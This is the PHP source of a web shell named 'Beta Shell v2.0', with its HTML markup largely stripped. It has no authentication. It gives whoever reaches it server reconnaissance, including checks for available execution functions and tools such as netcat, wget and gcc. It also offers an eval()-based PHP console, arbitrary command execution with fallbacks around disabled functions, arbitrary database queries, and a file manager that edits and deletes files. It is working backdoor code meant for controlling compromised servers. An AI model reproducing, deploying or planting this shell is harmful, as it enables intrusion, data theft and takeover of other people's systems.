Beta Shell v2.0

"; // ==================== SERVER INFO ==================== if ($action == 'info') { echo "

Server Information

"; echo "

"; $disable_functions = ini_get('disable_functions'); $open_basedir = ini_get('open_basedir'); $info = array( 'Server Software' => $_SERVER['SERVER_SOFTWARE'] ?? 'N/A', 'PHP Version' => phpversion(), 'PHP Built On' => php_uname(), 'Server IP' => $_SERVER['SERVER_ADDR'] ?? 'N/A', 'Remote IP' => $_SERVER['REMOTE_ADDR'] ?? 'N/A', 'Server Name' => $_SERVER['SERVER_NAME'] ?? 'N/A', 'Document Root' => $_SERVER['DOCUMENT_ROOT'] ?? 'N/A', 'Script Path' => __FILE__, 'Current Dir' => getcwd(), 'Current User' => function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid())['name'] . ' (' . posix_geteuid() . ')' : (function_exists('exec') ? trim(exec('whoami 2>/dev/null')) : 'N/A'), 'PHP User' => get_current_user(), 'PHP SAPI' => php_sapi_name(), 'Safe Mode' => ini_get('safe_mode') ? 'On' : 'Off', 'Open Basedir' => $open_basedir ? $open_basedir : 'Disabled', 'Disable Functions' => $disable_functions ? $disable_functions : 'None', 'allow_url_fopen' => ini_get('allow_url_fopen') ? 'On' : 'Off', 'allow_url_include' => ini_get('allow_url_include') ? 'On' : 'Off', 'max_execution_time' => ini_get('max_execution_time') . 's', 'memory_limit' => ini_get('memory_limit'), 'upload_max_filesize' => ini_get('upload_max_filesize'), 'post_max_size' => ini_get('post_max_size'), 'OS' => php_uname('s') . ' ' . php_uname('r') . ' ' . php_uname('m'), 'Hostname' => php_uname('n'), ); foreach ($info as $key => $val) { echo "" . str_pad($key, 22, ' ') . ": $val
"; } echo "
Disk Usage:
"; $total = disk_total_space('.'); $free = disk_free_space('.'); $used = $total - $free; $pct = ($total > 0) ? round(($used/$total)*100, 1) : 0; echo "Total: " . format_size($total) . " | Used: " . format_size($used) . " | Free: " . format_size($free) . "
"; echo "

"; echo "" . $pct . "% used"; echo "

"; } // ==================== SECURITY CHECK ==================== elseif ($action == 'sec') { echo "

Security Checks

"; echo "Database Support:
"; $db_checks = array( 'MySQL (mysql)' => function_exists('mysql_connect'), 'MySQLi' => function_exists('mysqli_connect'), 'PostgreSQL' => function_exists('pg_connect'), 'SQLite' => class_exists('SQLite3'), 'MSSQL' => function_exists('sqlsrv_connect') || function_exists('mssql_connect'), 'Oracle' => function_exists('oci_connect'), ); foreach ($db_checks as $key => $val) { echo "  " . ($val ? '✔' : '✘') . " $key
"; } echo "
Execution Functions:
"; $funcs = array('exec', 'system', 'shell_exec', 'passthru', 'popen', 'proc_open', 'pcntl_exec'); $disabled = explode(',', ini_get('disable_functions')); foreach ($funcs as $f) { $avail = function_exists($f) && !in_array($f, $disabled); echo "  " . ($avail ? '✔' : '✘') . " $f()
"; } echo "
Network Functions:
"; $net = array('curl_version', 'fsockopen', 'pfsockopen', 'stream_socket_client', 'socket_create'); foreach ($net as $f) { echo "  " . (function_exists($f) ? '✔' : '✘') . " $f()
"; } echo "
File Functions:
"; $file_funcs = array('fopen', 'fread', 'fwrite', 'file_get_contents', 'file_put_contents', 'readfile', 'copy', 'rename', 'chmod'); foreach ($file_funcs as $f) { echo "  " . (function_exists($f) ? '✔' : '✘') . " $f()
"; } echo "
Other Tools:
"; $tools = array( 'Perl' => 'which perl 2>/dev/null || where perl 2>nul', 'Python' => 'python --version 2>/dev/null || python3 --version 2>/dev/null', 'Wget' => 'which wget 2>/dev/null', 'Curl' => 'which curl 2>/dev/null', 'Netcat' => 'which nc 2>/dev/null', 'Git' => 'which git 2>/dev/null', 'Compilers (gcc)' => 'which gcc 2>/dev/null || which cc 2>/dev/null', ); foreach ($tools as $tool => $check) { $out = ''; if (function_exists('exec') && !in_array('exec', $disabled)) { exec($check . ' 2>/dev/null', $out); } echo "  " . (!empty($out) ? '✔' : '✘') . " $tool
"; } echo "
PHP Extensions:
"; $exts = array('json', 'xml', 'zip', 'gd', 'mbstring', 'openssl', 'mysqli', 'pdo', 'soap', 'sockets', 'curl'); foreach ($exts as $ext) { echo "  " . (extension_loaded($ext) ? '✔' : '✘') . " $ext
"; } echo "

"; } // ==================== PHP CONSOLE ==================== elseif ($action == 'php') { echo "

PHP Console

"; echo ""; echo ""; if (isset($_POST['phpcode'])) { echo "

Output

"; echo "

";
        ob_start();
        try {
            eval($_POST['phpcode']);
        } catch (Throwable $e) {
            echo "Error: " . $e->getMessage();
        }
        $out = ob_get_clean();
        echo htmlspecialchars($out);
        echo "

"; } } // ==================== DATABASE ==================== elseif ($action == 'db') { echo "

Database Manager

"; $dbtype = isset($_POST['dbtype']) ? $_POST['dbtype'] : 'mysqli'; $dbhost = isset($_POST['dbhost']) ? $_POST['dbhost'] : 'localhost'; $dbuser = isset($_POST['dbuser']) ? $_POST['dbuser'] : 'root'; $dbpass = isset($_POST['dbpass']) ? $_POST['dbpass'] : ''; $dbname = isset($_POST['dbname']) ? $_POST['dbname'] : ''; $dbport = isset($_POST['dbport']) ? $_POST['dbport'] : '3306'; $dbquery = isset($_POST['dbquery']) ? $_POST['dbquery'] : 'SELECT VERSION();'; echo ""; if (isset($_POST['dbhost']) && isset($_POST['dbquery'])) { echo "

Query Result

"; try { if ($dbtype == 'mysqli') { $conn = @new mysqli($dbhost, $dbuser, $dbpass, $dbname, (int)$dbport); if ($conn->connect_error) { echo "Connection Error: " . $conn->connect_error . ""; } else { if ($result = $conn->query($dbquery)) { if ($result instanceof mysqli_result) { if ($result->num_rows > 0) { echo ""; $fields = $result->fetch_fields(); foreach ($fields as $field) echo ""; echo ""; while ($row = $result->fetch_assoc()) { echo ""; foreach ($row as $val) echo ""; echo ""; } echo "

" . htmlspecialchars($field->name) . "
" . htmlspecialchars(substr($val ?? '', 0, 200)) . "

"; echo "

" . $result->num_rows . " row(s) returned

"; } else { echo "Query executed. 0 rows returned."; } } else { echo "Query executed successfully. " . $conn->affected_rows . " row(s) affected."; } } else { echo "Query Error: " . $conn->error . ""; } $conn->close(); } } elseif ($dbtype == 'pdo_mysql') { $conn = @new PDO("mysql:host=$dbhost;port=$dbport;dbname=$dbname", $dbuser, $dbpass); $stmt = $conn->query($dbquery); if ($stmt && $stmt->columnCount() > 0) { echo ""; for ($i = 0; $i < $stmt->columnCount(); $i++) { $col = $stmt->getColumnMeta($i); echo ""; } echo ""; while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) { echo ""; foreach ($row as $val) echo ""; echo ""; } echo "

" . htmlspecialchars($col['name']) . "
" . htmlspecialchars(substr($val ?? '', 0, 200)) . "

"; } else { echo "Query executed successfully."; } } } catch (Exception $e) { echo "Error: " . $e->getMessage() . ""; } echo "

"; } } // ==================== COMMAND ==================== elseif ($action == 'cmd') { echo "

Command Execution

"; $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'id'; echo ""; if (isset($_POST['cmd'])) { echo "

Output

"; echo "

";
        $retcode = -1;
        
        if (function_exists('exec') && !in_array('exec', explode(',', ini_get('disable_functions')))) {
            exec($cmd, $output_lines, $retcode);
            echo htmlspecialchars(implode("\n", $output_lines));
        } elseif (function_exists('system')) {
            ob_start();
            system($cmd, $retcode);
            echo htmlspecialchars(ob_get_clean());
        } elseif (function_exists('shell_exec') && !in_array('shell_exec', explode(',', ini_get('disable_functions')))) {
            echo htmlspecialchars(shell_exec($cmd));
        } elseif (function_exists('passthru')) {
            ob_start();
            passthru($cmd, $retcode);
            echo htmlspecialchars(ob_get_clean());
        } elseif (function_exists('popen')) {
            $h = @popen($cmd, 'r');
            if ($h) {
                while (!feof($h)) echo htmlspecialchars(fgets($h));
                pclose($h);
            }
        } else {
            echo "[!] No command execution functions available";
        }
        echo "

"; echo "

"; } } // ==================== FILE MANAGER ==================== else { $dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd(); $dir = str_replace('\\', '/', realpath($dir)); if (!is_dir($dir)) $dir = getcwd(); echo "

File Manager

"; // Path breadcrumb echo "

"; $drives = list_drives(); if (!empty($drives)) { foreach ($drives as $drive) { echo "[" . substr($drive, 0, 1) . ":] "; } echo "| "; } $parts = explode('/', $dir); $path_build = ''; echo "~ "; foreach ($parts as $part) { if ($part === '') continue; $path_build .= '/' . $part; echo "/$part"; } echo "

"; // Toolbar echo ""; // File list $files = scandir($dir); echo ""; echo ""; if ($dir != '/') { $parent = dirname($dir); echo ""; } foreach ($files as $file) { if ($file == '.' || $file == '..') continue; $full = $dir . '/' . $file; $is_dir = is_dir($full); $size = $is_dir ? '-' : format_size(filesize($full)); $perms = get_perms($full); $mtime = date('Y-m-d H:i:s', filemtime($full)); echo ""; if ($is_dir) { echo ""; } else { echo ""; } echo ""; echo ""; echo ""; echo ""; } echo "

Name	Size	Perms	Modified	Actions
[ .. / .. ]
$file	$file	$size	$perms	$mtime	"; if (!$is_dir) { echo "Edit"; } echo "Del"; echo "

"; // File edit if (isset($_GET['act']) && $_GET['act'] == 'edit' && isset($_GET['file'])) { $file = $_GET['file']; if (is_file($file)) { $content = @file_get_contents($file); echo "

Editing: " . basename($file) . " (" . format_size(filesize($file)) . ")

"; echo ""; echo ""; } } if (isset($_GET['act']) && $_GET['act'] == 'save' && isset($_GET['file']) && isset($_POST['content'])) { @file_put_contents($_GET['file'], $_POST['content']); echo ""; } } echo "

Type:
Host:
Port:
User:
Pass:
Database:
Query:	" . htmlspecialchars($dbquery) . "